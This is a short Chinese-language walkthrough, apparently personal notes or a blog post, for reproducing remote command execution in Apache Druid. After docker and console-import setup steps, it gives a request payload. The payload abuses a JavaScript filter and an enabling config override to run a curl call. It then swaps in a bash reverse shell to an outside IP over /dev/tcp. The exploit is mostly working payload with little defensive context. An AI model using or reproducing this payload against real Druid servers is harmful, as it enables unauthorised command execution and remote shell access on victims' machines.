Apache Druid远程命令执行
环境搭建
参考现有的低版本druid
docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
启动来访问不了。。。只能官网下载安装
druid下载地址
安装完成后访问IP:8888
导入文件
填写目录
填入
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
填好内容
抓包,修改filter的内容
{
"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('curl ip:8000')}",
"dimension":"added",
"":{
"enabled":"true"
}
}
将命令修改为反弹shell
/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.37.132/8000 0>&1